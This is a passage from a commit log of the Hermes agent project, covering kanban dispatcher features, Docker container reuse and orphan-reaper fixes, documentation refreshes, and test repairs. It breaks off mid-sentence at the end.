Compare commits

263 Commits

Author SHA1 Message Date
Teknium 3b6347af15 feat(kanban): default_assignee fallback + per-profile concurrency cap (#27145, #21582) (#34244)
Two related dispatcher behaviors that have been missing for a while.

## kanban.default_assignee (#27145)

Reporter (@agarzon): dashboard creates a task without an assignee, task
parks in 'ready' forever even though the operator's intent ('default')
is perfectly clear. The dispatcher already had a 'skipped_unassigned'
bucket but no fallback routing — users had to manually type 'default'
in the assignee field every time.

Behavior: when 'kanban.default_assignee' is set in config.yaml, the
dispatcher applies that assignee to any unassigned ready task before
deciding whether to spawn. The row is mutated (assignee column + an
'assigned' event with source='kanban.default_assignee' for the audit
trail). Empty/whitespace config value = no fallback, preserving the
existing skipped_unassigned behavior.

Dry-run mode reports what WOULD happen via the new
'auto_assigned_default' bucket on DispatchResult, but does NOT mutate
the DB — operators using 'hermes kanban dispatch --dry-run' see the
routing decision before committing.
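
A minimal sketch of the fallback and its dry-run behavior, assuming a simplified in-memory task shape. `Task`, `apply_default_assignee`, and the tuple-based event log are hypothetical names for illustration, not the dispatcher's actual API.

```python
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Task:
    # Hypothetical stand-in for a kanban row.
    task_id: str
    assignee: Optional[str] = None
    events: list = field(default_factory=list)


def apply_default_assignee(tasks, default_assignee, dry_run=False):
    """Return (auto_assigned_default, skipped_unassigned) lists of task ids."""
    # An empty or whitespace-only config value means "no fallback".
    fallback = (default_assignee or "").strip() or None
    auto_assigned, skipped = [], []
    for task in tasks:
        if task.assignee:
            continue  # explicit assignees are left untouched
        if fallback is None:
            skipped.append(task.task_id)
            continue
        auto_assigned.append(task.task_id)
        if not dry_run:
            # Only a real tick mutates the row and records the audit event.
            task.assignee = fallback
            task.events.append(("assigned", "kanban.default_assignee"))
    return auto_assigned, skipped
```

Calling it with `dry_run=True` reports the same task ids a real tick would assign, while leaving every `Task` unchanged.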

## kanban.max_in_progress_per_profile (#21582)

Reporters (@edwardchenchen, @simlu; 4 reactions): fan-out workloads
saturate one profile's local model / API quota / browser pool while
other profiles sit idle. The existing global 'max_in_progress' caps
total workers but doesn't balance across profiles.

Behavior: when 'kanban.max_in_progress_per_profile' is set to a
positive int, the dispatcher tracks per-assignee running counts (one
query at tick start) and refuses to spawn for any assignee already at
the cap. Tasks blocked this way go to a new
'skipped_per_profile_capped' bucket on DispatchResult as
(task_id, assignee, current_running_count) tuples — NOT an
operator-actionable failure, just 'try again next tick when the
profile has capacity'.

Pre-existing 'running' tasks count against the cap (verified via
regression test). The cap respects dry_run mode by incrementing
its in-memory counter on each would-be spawn so dry_run reports
the same balanced subset that a real tick would.

Invalid cap values (0, negative, non-int, None) are treated as 'no
cap', preserving the existing behavior. Backward-compatible for
installs that don't set the config.
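
The cap logic above can be sketched as follows. This is an illustration under stated assumptions: `normalize_cap` and `plan_spawns` are hypothetical helpers, and the real dispatcher reads its running counts from the database rather than from a list.

```python
from collections import Counter


def normalize_cap(value):
    """Return a positive int cap, or None for 'no cap'."""
    # Assumption: bool is rejected even though it subclasses int.
    if isinstance(value, int) and not isinstance(value, bool) and value > 0:
        return value
    return None


def plan_spawns(ready, running_assignees, cap):
    """Decide which ready tasks may spawn this tick.

    ready: list of (task_id, assignee) in dispatch order.
    running_assignees: one entry per task already in 'running'.
    Returns (to_spawn, skipped_per_profile_capped).
    """
    cap = normalize_cap(cap)
    running = Counter(running_assignees)  # counted once at tick start
    to_spawn, capped = [], []
    for task_id, assignee in ready:
        if cap is not None and running[assignee] >= cap:
            capped.append((task_id, assignee, running[assignee]))
            continue
        to_spawn.append(task_id)
        # Count the would-be spawn so a dry run sees the same balanced subset.
        running[assignee] += 1
    return to_spawn, capped
```

Because the counter is incremented for every planned spawn, the function needs no separate dry-run branch: planning and executing select the same tasks.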

## Surfaces

- 'hermes kanban dispatch' CLI now prints 'Auto-assigned to
  kanban.default_assignee=X: ...' and 'Deferred (X at per-profile cap,
  N running): ...' lines, plus matching JSON keys in --json output.
- Gateway dispatcher logs the configured values at startup
  ('default_assignee=X', 'max_in_progress_per_profile=N').
- 'kanban.max_in_progress_per_profile' added to DEFAULT_CONFIG with
  inline docs.

## Validation

- tests/hermes_cli/test_kanban_default_assignee.py (6 cases): no-cap
  baseline, auto-assign + DB mutation, dry-run reports without
  mutating, whitespace treated as None, explicit assignees untouched,
  DispatchResult field schema.
- tests/hermes_cli/test_kanban_per_profile_cap.py (9 cases including
  4 parametrized): no-cap baseline, balanced 2-profile fan-out,
  pre-existing running counts against cap, invalid cap values
  (0/-1/'abc'/None), capped tasks dispatched on next tick after
  running task completes, DispatchResult field schema.
- Broader kanban suite: 464/464 pass (was 449 baseline; +15 new
  regression tests across both features).

## Credit

#27145 — Jimmy Johansson reported the dispatcher skipped-unassigned
gap; @agarzon scoped the simpler 'honor kanban.default_assignee' fix
that matches the existing config knob.
#21582 — @edwardchenchen filed the per-profile cap ask after hitting
model 429s on fan-out research projects; @simlu confirmed the same
pain on local-model setups.
2026-05-28 19:02:55 -07:00
Ben 42612aa350 docs(docker): refresh user-guide page for s6-overlay reality
The page was last meaningfully rewritten in the pre-s6 (tini) era and had
drifted on five points that no longer matched the image:

1. "Running the dashboard" claimed the entrypoint backgrounds
   `hermes dashboard` and prefixes its output with `[dashboard]`. That
   was the pre-s6 entrypoint.sh path; under s6 the dashboard is a
   supervised s6-rc service (`docker/s6-rc.d/dashboard/run`) with no
   sed-prefix pipeline. Rewrote the section accordingly.

2. The default for `HERMES_DASHBOARD_HOST` was documented as
   `127.0.0.1`. The s6 run script defaults it to `0.0.0.0`
   (`dash_host="${HERMES_DASHBOARD_HOST:-0.0.0.0}"`). Fixed the table
   and the surrounding prose.

3. Multi-profile was documented as "not recommended in Docker — run
   one container per profile." That advice was load-bearing when
   there was no in-container supervisor, but the s6 architecture
   explicitly adds per-profile gateway supervision: each profile
   created via `hermes profile create <name>` gets a slot under
   `/run/service/gateway-<name>/`, the `02-reconcile-profiles`
   cont-init script restores them across `docker restart` from
   `gateway_state.json`, and `hermes gateway start/stop/restart` is
   intercepted by `_dispatch_via_service_manager_if_s6` to route
   through `s6-svc`. Pivoted the section to "one container, many
   supervised profile gateways" as the default, with a comparison
   table and a "When you DO want a separate container" escape
   hatch for the genuine resource-isolation / network-segmentation
   cases.

4. The Compose example trailer also claimed `[dashboard]` log
   prefixing. Replaced with the actual log routing.

5. Added a new "Where the logs go" section covering all four log
   surfaces: per-profile gateways (tee'd to `docker logs` AND
   `${HERMES_HOME}/logs/gateways/<profile>/current` since PR
   b34532319), dashboard (`docker logs`, no prefix), boot reconciler
   (`container-boot.log`), and `hermes logs`. The gateway-mode and
   Compose sections cross-reference this rather than each carrying
   their own routing prose.

Added a new "docker exec automatically drops to the hermes user"
subsection under "What the Dockerfile does", next to the existing
Privilege model warning. Documents the `/opt/hermes/bin/hermes` shim
(landed via the docker-exec privilege-drop work) — operators don't
need to remember `--user hermes` for `docker exec hermes login`,
`docker exec hermes profile create …`, etc. The historical footgun
(`auth.json` written as `root:root`, supervised gateway then can't
read its own auth file) is mentioned only as context for what the
fail-loud `exit 126` is protecting against, not as a problem the
reader needs to solve. The `HERMES_DOCKER_EXEC_AS_ROOT=1` opt-out is
documented for diagnostic sessions.

The "Permission denied" troubleshooting subsection now carries a
single-line pointer to the new section instead of duplicating it.

The `--insecure` framing reflects commit fb5125362 (opt-in via
`HERMES_DASHBOARD_INSECURE`, not derived from bind host): the OAuth
gate is the authority, the bind host alone never implies
`--insecure`, and opting out is an explicit security trade-off.

Anchors verified resolve. i18n zh-Hans mirror left for the
translation flow to catch up.
2026-05-29 11:55:01 +10:00
Ben 3c6e70aef1 docs(docker): document new persist-across-processes contract and orphan reaper (#20561)
Updates the Docker Backend section of the user-guide configuration page
to match the actual behavior shipped in PR #33645. Pre-PR the docs
claimed "container is stopped and removed on shutdown," which was
never quite true for the documented happy path and is now actively
wrong: in default mode the container survives across Hermes processes
so background processes (npm watchers, dev servers, long-running
pytest) carry over the way the "ONE long-lived container shared
across sessions" promise requires.

Changes to `website/docs/user-guide/configuration.md`:

* Reworked the intro paragraph at the top of the Docker Backend
  section to describe the actual cross-process reuse contract.
* Expanded the YAML example with the new keys
  `docker_persist_across_processes` and `docker_orphan_reaper`, plus
  the pre-existing-but-undocumented `docker_env`, `timeout`, and
  `lifetime_seconds`.  Clarified the `container_persistent` comment
  to disambiguate from `docker_persist_across_processes`.
* Added a `docker_env` vs `docker_forward_env` explainer (one
  injects literal KEY=value, the other forwards values from the
  host/.env — easy to confuse).
* Replaced the one-line "Container lifecycle" paragraph with a full
  subsection covering:
    - the three labels Hermes tags every container with
      (hermes-agent, hermes-task-id, hermes-profile)
    - the label-probe reuse mechanism on startup
    - a four-row teardown-trigger table covering every situation
      that destroys the container in default mode
    - edge cases (OOM kill, profile switching)
* Added an "Environment variable overrides" table covering all
  TERMINAL_* env vars relevant to the Docker backend, including the
  previously-undocumented `TERMINAL_DOCKER_ENV` and
  `HERMES_DOCKER_BINARY`.

Changes to `website/docs/user-guide/docker.md`:

* Extended the cross-link admonition (around l.227) so the
  Hermes-in-Docker page points at the new terminal-backend keys
  (`docker_env`, `docker_persist_across_processes`,
  `docker_orphan_reaper`) alongside the ones already mentioned.

No code changes.  Behavior already covered by tests added in earlier
commits on this branch (#33645 commits 1-5).

Refs #20561
2026-05-29 11:49:54 +10:00
Ben 2f0f03c40d fix(docker): cleanup_vm() default honors persist mode (don't kill container on session close)
Commit 4 made cleanup_vm() default to force_remove=True, which was wrong:
cleanup_vm() is called from AIAgent.close() (TUI session close at
tui_gateway/server.py:2991, gateway session teardown at gateway/run.py:3569)
and from per-turn cleanup (agent/chat_completion_helpers.py:1517). All
three are session-lifecycle events that should honor persist mode, not
explicit user-initiated teardown.

Ben reported the symptom: container shared between multiple TUI sessions
(good) but killed as soon as any session closed (bad). With force_remove=True
as the default, every `session.close` JSON-RPC tore down the container.

The fix is to flip cleanup_vm()'s force_remove default back to False.
The kwarg still exists for future explicit-teardown paths (`/reset`-style
flows, "destroy my sandbox" commands) that haven't been wired up yet.

Two new unit tests pin the behavior:

* `test_cleanup_vm_default_honors_persist_mode` — asserts
  `cleanup_vm(task_id)` does neither docker stop nor docker rm on a
  persist-mode container (the regression Ben caught).
* `test_cleanup_vm_force_remove_tears_down_persist_container` —
  asserts the kwarg still flows through the runtime-signature-inspection
  plumbing to the backend's cleanup().

E2E verified against real Docker (in addition to all 17 existing checks):

  ✓ Default cleanup_vm() leaves persist-mode container running
  ✓ cleanup_vm(force_remove=True) removed the container

Refs #20561
2026-05-29 11:49:54 +10:00
Ben 5c2170a7c6 fix(docker): persist-mode cleanup is no-op; add force_remove kwarg (#20561)
The first iteration of this PR did docker stop on every cleanup in
persist mode (only skipping docker rm). Ben caught this as
contradicting the documented "ONE long-lived container shared across
sessions" semantics: stopping the container on every Hermes /quit kills
any background processes inside (npm watchers, pytest watchers,
long-running scripts) — exactly the case persist mode is supposed to
protect.

This commit splits the cleanup paths cleanly:

* **Persist mode (default)** — cleanup() is a NO-OP for the
  container. Container stays running, processes survive, next Hermes
  process attaches via the existing label probe in ~ms instead of
  waiting for docker start. Resource reclamation happens via the
  orphan reaper at next startup (2 × lifetime_seconds threshold), which
  covers the SIGKILL / OOM / abandoned-laptop cases.
* **Opt-out mode (persist_across_processes=False)** — unchanged:
  docker stop + docker rm -f on cleanup as before.
* **Explicit teardown** — new cleanup(force_remove=True) kwarg
  overrides persist mode and tears the container down unconditionally.
  cleanup_vm(task_id) now defaults to force_remove=True since
  it's the user-driven reset path (called from AIAgent.close(),
  /reset-style flows, and the idle reaper's per-turn cleanup).

The idle reaper in _cleanup_inactive_envs calls env.cleanup()
directly with no kwargs, so idle persist-mode envs are no-op'd — the
container survives the in-process pop and the next tool call re-probes
via labels. No state leak: _container_id is still cleared on the
in-process handle.

E2E verified against real Docker:

  ✓ Container is still running after cleanup()
  ✓ Background process (sleep loop) survived cleanup()
  ✓ Filesystem state preserved across cleanup()
  ✓ In-process container_id cleared (next __init__ will re-probe)
  ✓ Background process visible from reused env (no docker start happened)
  ✓ force_remove=True removed the container even in persist mode
  ✓ cleanup_vm() removed the container (defaults to force_remove=True)

Test changes:

* Replaces `test_cleanup_with_persist_only_stops_no_rm` with
  `test_cleanup_with_persist_is_noop_for_container` — asserts neither
  stop nor rm runs in persist mode, and the in-process handle is
  cleared so re-probe works.
* Adds `test_cleanup_force_remove_stops_and_rms_even_in_persist_mode`
  — covers the new kwarg.
* Updates `test_cleanup_uses_subprocess_run_not_detached_shell` and
  `test_wait_for_cleanup_after_cleanup_returns_true` to pass
  `force_remove=True` so they actually exercise the docker code path
  (default no-op would trivially pass).

cleanup_vm() forwards `force_remove` only to backends whose cleanup()
accepts the kwarg (currently just DockerEnvironment) via runtime
signature inspection — Modal/Daytona/SSH `cleanup()` signatures are
unchanged.
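
A minimal sketch of forwarding a kwarg by runtime signature inspection, as described above. `call_cleanup` and the two stand-in backend classes are hypothetical; only `inspect.signature` is a real standard-library call.

```python
import inspect


def call_cleanup(env, force_remove):
    """Call env.cleanup(), passing force_remove only if the backend accepts it."""
    params = inspect.signature(env.cleanup).parameters
    accepts_kwarg = "force_remove" in params or any(
        p.kind is inspect.Parameter.VAR_KEYWORD for p in params.values()
    )
    if accepts_kwarg:
        return env.cleanup(force_remove=force_remove)
    return env.cleanup()


class DockerLike:
    # Hypothetical backend whose cleanup() understands the kwarg.
    def cleanup(self, force_remove=False):
        return "removed" if force_remove else "noop"


class SSHLike:
    # Hypothetical backend with the unchanged, kwarg-free signature.
    def cleanup(self):
        return "closed"
```

The design choice here is that backends opt in by changing their own signature, so the caller never needs a list of backend types.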

Refs #20561
2026-05-29 11:49:54 +10:00
Ben d77d877665 fix(docker): startup orphan reaper for crashed-process containers
The cleanup-fix in the previous commit handles the graceful-exit leak: a
Hermes process that runs ``atexit`` will now actually wait on the docker
stop/rm worker thread, so containers either survive (persist mode) or are
fully removed (opt-out mode) by the time the interpreter exits.

But ``atexit`` doesn't fire on SIGKILL, OOM-kill, or terminal-window
close. Containers from those exits stay parked with no surviving Python
process to reuse or remove them, so they accumulate until the operator
intervenes with ``docker rm -f``. The cleanup-fix doesn't help this class
— there's no live cleanup() to fix.

This commit adds the safety net: a startup orphan reaper that runs once
per Hermes process and removes long-Exited hermes-labeled containers
that the prior commit couldn't reach.

Implementation:

* New ``reap_orphan_containers()`` in ``tools/environments/docker.py``.
  Filters: ``label=hermes-agent=1`` + ``status=exited`` + (optional)
  ``label=hermes-profile=<current>``. Per-container ``docker inspect``
  parses ``State.FinishedAt`` (with nanosecond-precision trimming for
  Python's microsecond-bound ``fromisoformat``); containers older than
  the threshold get ``docker rm -f``'d. The ``status=exited`` filter is
  load-bearing — a running container may belong to a sibling Hermes
  process whose reuse path will pick it up; killing it would crash the
  sibling mid-command. Single-container failures are logged and the
  sweep continues to the next candidate.

* New ``_maybe_reap_docker_orphans()`` helper in
  ``tools/terminal_tool.py``. Wired into ``_create_environment()`` for
  ``env_type == "docker"``. Gated by:

    - ``terminal.docker_orphan_reaper: true`` (default; opt-out for
      operators running multiple Hermes processes in the same profile
      who don't trust the conservative defaults)
    - ``_docker_orphan_reaper_ran`` module flag with double-checked
      locking — parallel subagents and RL rollouts don't trigger N
      concurrent docker ps storms
    - Age threshold = ``2 × TERMINAL_LIFETIME_SECONDS`` with a 60s floor
      (so ``TERMINAL_LIFETIME_SECONDS=0`` doesn't race the user's own
      setup)
    - Profile scoping — a research profile NEVER reaps the default
      profile's stragglers
    - Exception swallow — a janitor failure must never block container
      creation

* New config ``terminal.docker_orphan_reaper`` wired through all four
  config-bridge sites (cli.py, gateway/run.py, hermes_cli/config.py,
  tests/conftest.py) and pinned by
  ``test_docker_orphan_reaper_is_bridged_everywhere``.
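
The gating rules listed above can be sketched like this. The names `maybe_reap`, `reap_threshold_seconds`, and the module-level flag are hypothetical simplifications of the helper the commit describes.

```python
import logging
import threading

_reaper_ran = False
_reaper_lock = threading.Lock()


def reap_threshold_seconds(lifetime_seconds, floor=60):
    """Age threshold: twice the lifetime, never below the floor."""
    return max(2 * lifetime_seconds, floor)


def maybe_reap(reap_fn, enabled=True):
    """Run reap_fn at most once per process; never raise."""
    global _reaper_ran
    if not enabled or _reaper_ran:  # fast path, no lock taken
        return False
    with _reaper_lock:
        if _reaper_ran:  # re-check under the lock (double-checked locking)
            return False
        _reaper_ran = True
    try:
        reap_fn()
    except Exception:
        # A janitor failure must never block container creation.
        logging.getLogger(__name__).debug("orphan reaper failed", exc_info=True)
    return True
```

Setting the flag before calling `reap_fn` means concurrent callers skip immediately instead of queueing behind a slow sweep.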

Coverage:

* 9 new unit tests in test_docker_environment.py — happy path, recent-
  container sparing, profile scoping, unparseable-timestamp safety,
  docker-ps-failure handling, partial-failure continuation, nanosecond
  timestamp parsing, zero-value FinishedAt rejection.
* 6 new integration tests in test_docker_orphan_reaper_integration.py
  — once-per-process gate, disable-flag respected, lifetime doubling
  with 60s floor, current-profile filter wiring, exception swallow.
* 1 new bridge-invariant regression test.
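
For the nanosecond-precision trimming and zero-value rejection mentioned above, a sketch might look like the following. `parse_finished_at` is a hypothetical name, and the regex assumes the RFC 3339 shape that `docker inspect` prints for `State.FinishedAt`.

```python
import re
from datetime import datetime, timezone

_TIMESTAMP = re.compile(
    r"^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})(?:\.(\d+))?(Z|[+-]\d{2}:\d{2})$"
)


def parse_finished_at(value):
    """Parse a Docker-style timestamp; return None if it is unusable."""
    if not isinstance(value, str):
        return None
    match = _TIMESTAMP.match(value)
    if not match:
        return None
    base, fraction, tz = match.groups()
    # Trim nanoseconds to the six digits datetime can represent.
    fraction = (fraction or "0")[:6].ljust(6, "0")
    tz = "+00:00" if tz == "Z" else tz
    try:
        parsed = datetime.fromisoformat(f"{base}.{fraction}{tz}")
    except ValueError:
        return None
    if parsed.year <= 1:
        # Docker reports 0001-01-01 for containers that never finished.
        return None
    return parsed
```

Returning `None` for anything unparseable lets the caller treat "unknown age" as "do not remove", which is the conservative choice for a reaper.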

Closes #20561 (combined with the two prior commits on this branch).
2026-05-29 11:49:54 +10:00
Ben ac8e238bc8 fix(docker): reuse containers across processes + fix cleanup leaks
The Docker backend docs claim "Single persistent container — ONE long-
lived container shared across sessions, /new, /reset, and delegate_task
subagents. Stopped/removed on shutdown." In practice the code only
honored that contract within a single Python process via the in-memory
`_active_environments[task_id]` cache. Every `hermes chat` invocation
spawned a fresh `hermes-<hex>` container; older containers piled up in
`Exited` state and accumulated until manual `docker rm` (issue #20561).

Three root causes, all addressed by this commit:

1. No cross-process container discovery.
2. `cleanup()` used fire-and-forget `subprocess.Popen("... &", shell=True)`
   which raced with parent-process exit: when Python exited promptly the
   detached shell child got killed mid-`docker stop`, leaving stopped
   containers behind.
3. The `docker rm` step in cleanup was gated on `not self._persistent`
   (the bind-mount-persistence flag). Default config sets
   `container_persistent: true`, so the default happy path skipped `rm`
   entirely — even when the user explicitly didn't want cross-process
   reuse, containers leaked.

Fix:

* Add `DockerEnvironment.__init__(persist_across_processes=True)`. When
  true, init probes
  `docker ps -a --filter label=hermes-agent=1
                  --filter label=hermes-task-id=<task>
                  --filter label=hermes-profile=<profile>`
  and reuses a matching container (running → attach; stopped →
  `docker start` → attach; `docker start` failure → fall through to a
  fresh `docker run`). Multiple matches prefer the running one, with the
  stragglers left for the orphan reaper (next commit) to clean up.

* Rewrite `cleanup()`. Uses `subprocess.run(..., timeout=30)` on a
  daemon `threading.Thread`, not the racy `Popen(... &)`. The
  `_persistent` guard is dropped on the `rm` step; `rm` now runs
  whenever `persist_across_processes` is false, regardless of the
  bind-mount-persistence setting. The leak class is gone in all
  combinations.

* Add `wait_for_cleanup(timeout)`. `tools/terminal_tool.py`'s atexit
  hook calls this on every active env, blocking up to 15s for the
  cleanup thread before interpreter exit. Without this, `hermes /quit`
  raced the daemon-thread teardown and dropped the stop/rm work.

* New config `terminal.docker_persist_across_processes` (default
  `true`, which restores the documented contract). Set `false` for hard
  per-process isolation. Wired through all four config-bridge sites
  (cli.py env_mappings, gateway/run.py _terminal_env_map,
  hermes_cli/config.py _config_to_env_sync, tests/conftest.py env-strip
  list); regression-pinned by
  `test_docker_persist_across_processes_is_bridged_everywhere` matching
  the existing pattern for docker_run_as_host_user / docker_env.
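
The cleanup rewrite and the atexit wait described in the bullets above can be sketched as follows. `CleanupHandle` is a hypothetical class; the example runs a harmless Python subprocess in place of `docker stop` / `docker rm` so it works without Docker.

```python
import subprocess
import sys
import threading


class CleanupHandle:
    """Runs teardown commands on a daemon thread and lets callers wait for it."""

    def __init__(self):
        self._thread = None

    def cleanup(self, commands, timeout=30):
        def worker():
            for argv in commands:
                try:
                    subprocess.run(argv, timeout=timeout,
                                   capture_output=True, check=False)
                except (OSError, subprocess.TimeoutExpired):
                    pass  # best-effort teardown; real code would log this

        self._thread = threading.Thread(target=worker, daemon=True)
        self._thread.start()

    def wait_for_cleanup(self, timeout=15):
        """Return True if nothing is pending or the worker finished in time."""
        if self._thread is None:
            return True
        self._thread.join(timeout)
        return not self._thread.is_alive()


# Stand-in command; a Docker backend would pass its stop/rm argv lists here.
handle = CleanupHandle()
handle.cleanup([[sys.executable, "-c", "pass"]])
finished = handle.wait_for_cleanup(timeout=15)
```

Unlike a detached `Popen("... &", shell=True)`, the thread can be joined, so an exit hook has something concrete to wait on.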

Reuse intentionally does NOT compare image / mounts / resources — only
the labels. Operators changing those settings should set
`docker_persist_across_processes: false` (or `docker rm -f` the
labeled container) to force a fresh start. This keeps the probe cheap
and the failure mode obvious.
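
A sketch of the label-only probe, assuming the probe output is requested as tab-separated `ID` and `State` columns. The `--format` template and both function names are assumptions made for illustration; the commit only specifies the three `--filter` arguments.

```python
def build_probe_argv(task_id, profile, docker_binary="docker"):
    """Build the `docker ps` probe that matches on labels only."""
    return [
        docker_binary, "ps", "-a",
        "--filter", "label=hermes-agent=1",
        "--filter", f"label=hermes-task-id={task_id}",
        "--filter", f"label=hermes-profile={profile}",
        # Assumed output format: one "<id>\t<state>" row per container.
        "--format", "{{.ID}}\t{{.State}}",
    ]


def pick_container(ps_output):
    """Prefer a running match, else the first other match, else None."""
    rows = [line.split("\t", 1) for line in ps_output.splitlines() if "\t" in line]
    for container_id, state in rows:
        if state == "running":
            return container_id, state
    return tuple(rows[0]) if rows else None
```

Nothing in the probe mentions image, mounts, or resources, which is why changing those settings does not by itself produce a fresh container.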

Coverage: 12 new unit tests in tests/tools/test_docker_environment.py
covering reuse paths (running, stopped, fallback, opt-out, duplicate
preference) and cleanup behavior (persist-mode no-rm, opt-out always-rm,
no-Popen, wait_for_cleanup semantics, partial-init safety). Plus one
config-bridge regression pin.

Refs #20561
2026-05-29 11:49:54 +10:00
Ben 8d129d013b fix(docker): tag containers with hermes-agent labels for identification
Issue #20561 (Docker containers accumulate) needs a way to identify
hermes-created containers from the outside — both for the orphan reaper
(a follow-up commit) and for operators triaging `docker ps -a | grep
hermes-` after a SIGKILL leaves stragglers. The previous `hermes-<hex>`
name prefix was the only signal, which broke down under cross-process
reuse (planned) and against any custom `--name` someone might pass via
`docker_extra_args`.

This commit adds three labels at `docker run` time:

  --label hermes-agent=1                # global sweep target
  --label hermes-task-id=<sanitized>    # per-task reuse key
  --label hermes-profile=<sanitized>    # per-profile isolation key

Values are sanitized to `[A-Za-z0-9_.-]` and truncated to 63 chars so the
label round-trips cleanly through `docker ps --filter label=key=value`.
Empty or non-string inputs collapse to "unknown" rather than producing
an unqueryable empty value.
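
A minimal sketch of the sanitization rule. The commit does not say whether disallowed characters are dropped or replaced, so replacing them with `_` is an assumption, and `sanitize_label_value` is a hypothetical name.

```python
import re


def sanitize_label_value(value, max_len=63):
    """Reduce a value to [A-Za-z0-9_.-], capped at max_len characters."""
    if not isinstance(value, str):
        return "unknown"
    # Assumption: each disallowed character becomes "_" rather than vanishing.
    cleaned = re.sub(r"[^A-Za-z0-9_.-]", "_", value)[:max_len]
    return cleaned or "unknown"
```

For example, `sanitize_label_value("my task/1")` yields `my_task_1`, which can be passed to `docker ps --filter label=hermes-task-id=my_task_1` without quoting problems.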

No behavior change: the labels are pure metadata. The follow-up commits
in this PR (cleanup-fix + orphan reaper) are what use them.

Refs #20561
2026-05-29 11:49:54 +10:00
Teknium 300140e006 test(tui_gateway): stop reloading server module in fixture teardown (#34217)
tui_gateway.server registers two atexit hooks at module load time:
ThreadPoolExecutor shutdown (line 170) and _shutdown_sessions (line 336).
Three test files reloaded the module on each fixture teardown to reset
per-test state. Each reload re-runs module-level code, including the
atexit registrations — duplicates accumulate across the test session.

At pytest interpreter shutdown the duplicated atexit hooks race the
stderr buffer flush:

    Fatal Python error: _enter_buffered_busy: could not acquire lock
    for <_io.BufferedWriter name='<stderr>'> at interpreter shutdown,
    possibly due to daemon threads

pytest reports 'tests passed but the slice exited non-zero', and the
shard turns red on CI. Surfaced today on PR #34193's test slice 1
(204 files, 3572 tests passed, then Fatal Python error during exit).

Fix: drop importlib.reload(mod) from the three fixtures that have it.
Per-test reset is handled by clearing the mutable session dicts
(_sessions, _pending, _answers). _methods is also no longer cleared —
it's populated at module import time and would only be re-populated by
a reload, so clearing it without reload broke session.resume /
command.dispatch / slash.exec method registration across tests.

Affected fixtures:
- tests/tui_gateway/test_goal_command.py
- tests/tui_gateway/test_protocol.py
- tests/tui_gateway/test_review_summary_callback.py

The second reload in test_protocol.py at line 211 (reload of
tui_gateway.transport) is preserved — transport.py has no atexit hooks
or threads, so reload is safe there.
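
The reload-free reset can be sketched as below. `reset_session_state` is a hypothetical helper, and a `SimpleNamespace` stands in for the imported server module so the example runs on its own.

```python
from types import SimpleNamespace


def reset_session_state(server):
    """Clear per-test mutable state in place; leave the method registry alone."""
    for name in ("_sessions", "_pending", "_answers"):
        getattr(server, name).clear()
    # _methods is deliberately not touched: it is filled at import time only,
    # so clearing it without a reload would leave no methods registered.


# Stand-in for the real module object.
fake_server = SimpleNamespace(
    _sessions={"s1": object()},
    _pending={"p1": object()},
    _answers={"a1": "yes"},
    _methods={"session.resume": lambda: None},
)
reset_session_state(fake_server)
```

In a pytest fixture this call would sit after the `yield`, where the reload used to be, so module-level code (including the atexit registrations) runs only once per test session.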

Tests: 84/84 in tests/tui_gateway/ pass cleanly with exit code 0; no
Fatal Python error at interpreter shutdown.
2026-05-28 18:16:54 -07:00
Teknium e71a2bd11b chore: release v0.15.1 (2026.5.29) (#34222) 2026-05-28 18:11:49 -07:00
Teknium 769ee86cd2 feat(kanban): attach images referenced in task bodies to worker vision (#34210)
Kanban workers now scan the task body for local image paths and
http(s) image URLs and attach them to the worker's first user turn —
matching the CLI/gateway behaviour for inbound images. Before, a
user pasting `/home/me/screenshot.png` or `https://example.com/img.png`
into a kanban task description had it sent to the model as plain
text and the pixels were never seen.

How it works:
* agent/image_routing.py gains extract_image_refs(text) → (paths, urls)
  that mirrors gateway/platforms/base.py:extract_local_files (absolute /
  ~-relative paths, image extensions only, ignores fenced/inline code).
* build_native_content_parts() accepts an optional image_urls= kwarg
  and emits passthrough image_url parts for remote URLs alongside the
  base64 data: URLs used for local paths.
* cli.py (single-query/quiet branch — the path every dispatcher-spawned
  worker takes) detects HERMES_KANBAN_TASK, reads the task body via
  kanban_db.get_task, runs extract_image_refs, and threads the results
  into the existing image-routing decision (native vs text). Best-effort:
  enrichment failures never block worker startup.
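
A rough sketch of what such an extractor could look like. The regexes, the extension list, and the handling of code spans are assumptions for illustration; they are not taken from `agent/image_routing.py`, and this version does not handle URLs with query strings.

```python
import re

_EXT = r"\.(?:png|jpe?g|gif|webp|bmp)"
_END = r"(?!\w|\.\w)"  # the extension must end the token
_FENCED_CODE = re.compile(r"`{3}.*?`{3}", re.DOTALL)
_INLINE_CODE = re.compile(r"`[^`\n]*`")
_URL = re.compile(r"https?://[^\s<>\"'`]+?" + _EXT + _END, re.IGNORECASE)
_PATH = re.compile(
    r"(?<![\w/.~])(?:~/|/)[^\s<>\"'`]*?" + _EXT + _END, re.IGNORECASE
)


def extract_image_refs(text):
    """Return (paths, urls) for image references found outside code spans."""
    # Blank out code first so quoted examples are not treated as attachments.
    text = _FENCED_CODE.sub(" ", text)
    text = _INLINE_CODE.sub(" ", text)
    urls = _URL.findall(text)
    # Drop URLs before path matching so a URL's path part is not counted twice.
    paths = _PATH.findall(_URL.sub(" ", text))
    return paths, urls
```

Only absolute and `~`-relative paths are matched, so a bare `screenshot.png` in prose is left alone.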

Tested:
* tests/agent/test_image_routing.py — 22 new tests for extract_image_refs
  and URL pass-through in build_native_content_parts.
* tests/hermes_cli/test_kanban_worker_image_extraction.py — 10 new tests
  driving real kanban_db round-trip (create task → read body → extract
  refs → build parts).
* E2E: created a fake kanban task with a body referencing both a local
  PNG and an https URL; verified the worker pipeline produces a
  multimodal user turn with 1 text part + 2 image_url parts (data URL
  for the local file, passthrough URL for the remote).
2026-05-28 17:50:42 -07:00
Ben 1b1e30510a test(docker): repair dashboard tests broken by the insecure-opt-in fix
The Docker integration test job started failing on main after
fb5125362 ("docker: opt in to dashboard --insecure via env var").
Two distinct failures, both fallout from that change being more
behaviour-changing than the existing test harness anticipated.

Failure 1 — test_dashboard_port_override (silent regression in an
already-existing test)
The test starts the container with just HERMES_DASHBOARD=1, defaults
to host=0.0.0.0, no HERMES_DASHBOARD_OAUTH_CLIENT_ID, no
HERMES_DASHBOARD_INSECURE. Pre-fix that combination got --insecure
auto-injected by the s6 run script (anything non-loopback was
implicitly insecure), so the OAuth gate stayed off and start_server
bound the port. Post-fix the gate engages, no provider is
registered, and start_server raises SystemExit before binding —
under s6 the dashboard goes into a restart loop and the test's
/proc/net/tcp poll finds nothing.

The same silent regression was hidden by three sibling tests
